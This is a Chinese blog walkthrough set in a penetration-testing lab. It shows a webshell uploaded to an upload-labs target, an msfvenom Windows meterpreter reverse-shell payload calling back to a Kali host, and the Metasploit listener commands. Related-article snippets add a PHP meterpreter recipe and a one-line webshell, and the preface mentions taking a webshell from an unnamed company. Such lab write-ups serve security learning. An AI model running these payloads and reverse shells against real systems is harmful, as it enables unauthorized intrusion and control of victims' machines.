通过web站点使用上传webshell的方式获取meterpreter权限

最新推荐文章于 2024-08-06 19:37:50 发布
最新推荐文章于 2024-08-06 19:37:50 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42253265/article/details/112980664
版权

前言:
这几天做渗透成功通过任意文件上传漏洞拿下了某公司的webshell
但一般通过上传webshell拿到的权限不是很高,所以要进行提权操作。

环境:
靶机地址:192.168.71.132 搭建了upload-labs-maste,用uplod靶机作为目标进行渗透
攻击机地址:192.168.71.141(kali)
物理机地址:略

操作:
先在upload-labs-maste上传webshell,使用一句话木马即可。

(嘿嘿,upload-labs-maste第一关简单上传webshell不用发出来吧,直接发结果就好了)
在这里插入图片描述
用的是哥斯拉的马子,现在已经上传成功了,让我们用哥斯拉连接一下
在这里插入图片描述
我们的webshell已经成功了,那么让我们来试一下提权。

在kali中创建后门木马shell.exe,拖至物理机

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.71.141 lport=8881 -f exe -o shell.exe

在这里插入图片描述

开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
showo ptions
set lhost 192.168.71.141
set lport 8881
run

在这里插入图片描述
返回哥斯拉,点击上传文件,上传shell.exe
在这里插入图片描述可以看到外面的文件已经上传到了靶机上了

执行shell.exe

start shell.exe

在这里插入图片描述
返回kali,已成功获取meterpreter权限

在这里插入图片描述

最后附上meterpreter提权的命令大全:
传送门

冰羽呐
关注
专栏目录
渗透系列:Webshell的介绍及工具的使用web安全系列)
weixin_54626591的博客
01-14 135
Webshell的介绍及工具的使用web安全系列)
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 304
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限
php Meterpreter Webshell
iteye_16188的博客
11-17 385
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.php到web服务器 3. 启动msfconsole 4. use multi/handler 5. set LHOST Attacker's_IP 6. set LPORT 443 7. set ...
【网络安全渗透测试零基础入门必知必会】之Windows权限提升实战,零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
08-06 628
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段系统权限提升与防御第2篇。当我们通过弱口令进入到应用后台管理当我们下载备份文件获取到数据库信息当我们通过漏洞拿到资产系统的Web权限当我们在公司被给予账号密码登录计算机或系统当我们在公司或钓鱼后门获取到某个公司机器系统。
如何上传WEBSHELL思路
12-26
如何上传WEBSHELL思路 如何上传WEBSHELL思路 如何上传WEBSHELL思路
全面利用本地Post方式获取WebSHELL
[智能天空教程区 Smart-sky]
02-10 1229
一、后台登录连试or=or的机会都没有,就会出现限制,如下的js function CheckForm(){ if (document.UserLogin.Name.value ==""){alert("请填写您的用户名!");document.UserLogin.Name.focus();return false;}var filter=/^/s*[.A-Za-z0-9_-]{5
通过sql获取靶机system权限
正在成为 code ape
08-23 593
一个比较简单的靶机渗透测试 攻击环境 虚拟机:kali windows10 攻击工具 nmap 扫描神器 浏览器 源代码审计 sqlmap 注入工具 msfvemon 生成木马获取监听会话 john hash爆破 rdesktop 远程终端 靶机环境 windows装有web+sql 渗透过程: 使用nmap进行服务端口信息扫描: 发现靶机上存在http服务,我们访问该http站点。 发现一个登陆页面,提交参数为:usernm和password,提交方式为post型,判断该页面可能
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2440
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点使用无文件的方式攻击利用执行方法二:通过web站点上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8022
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
网络攻防中的CTF综合靶机渗透实战:信息收集、Web漏洞挖掘、使用niktoWeb漏洞扫描器、使用dirb扫描网站目录、获取shellMetasploit 设置监听、种植Meterpreter等等
代码讲故事
03-21 311
网络攻防中的CTF综合靶机渗透实战:信息收集、Web漏洞挖掘、使用niktoWeb漏洞扫描器、使用dirb扫描网站目录、获取shellMetasploit 设置监听、种植Meterpreter等等。CTF(Capture The Flag)竞赛是一种网络安全竞赛,通常模拟真实的网络攻防场景,要求参赛者通过各种技术手段发现并利用系统漏洞,以获取隐藏在目标靶机中的“旗帜”(flag)。在CTF综合靶机渗透中,参赛者需要运用多种技术实现方案来突破靶机的安全防线。
Metasploit 之 webshell 提权
收集盒 Book box
08-04 1813
本文所涉及的方法只能在已授权的机器上做测试。     首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell
webshell、一句话木马的权限问题
m0_46736332的博客
09-11 2756
webshell一句话木马权限大小是由什么决定的。 webshell权限由不同级别的用户去运行容器所决定! 通俗来说,如果是管理员运行web服务器,那么上传的木马被容器解析之后,它(shell)的权限就是管理员的权限,如果是普通用户运行web服务器,那么上传的木马被容器解析之后,它(shell)的权限就是普通用户的权限
kali渗透学习-Web渗透WebShell(中国菜刀、WeBaCoo、Weevely)
weixin_43239236的博客
01-23 859
Webshell 本质:<?php echo shell_exec($_GET['cmd']);?> 就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便 windows平台 中国菜刀 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】 1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】 使用ssh连接metasploitabl
一句话webshell拿下站点服务器权限
09-29
本门课程分为2节课,通过课程利用靶场扫描上传webshell站点位置,上传webshell,并介绍webshell管理工具三种,让初学者认识和了解什么是webshell,管理工具主要有哪些,哪些比较安全等,希望借此让大家对网络安全有更清楚的认识和更浓厚的兴趣。课程主要内容:1)扫描站点目录寻找上传点2)上传webshell拿下站点权限3)管理webshell工具详细介绍
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1546
getshell之后的提权
Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 A)
网络安全领域___专研者.
06-02 2128
Web服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载.
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6667
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
渗透测试获取webshell方法总结
u013930899的博客
10-06 3397
本文总结了渗透测试php网站获取webshell的几种方法
利用Web文件上传漏洞获取Webshell的实战教程
接着,通过拼接URL并利用中国菜刀工具,攻击者得以获取webshell,从而可以远程操控服务器,执行下载、上传、删除等操作。 这个过程展示了攻击者如何利用漏洞创建一个后门入口,进一步强调了对文件上传功能进行严谨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值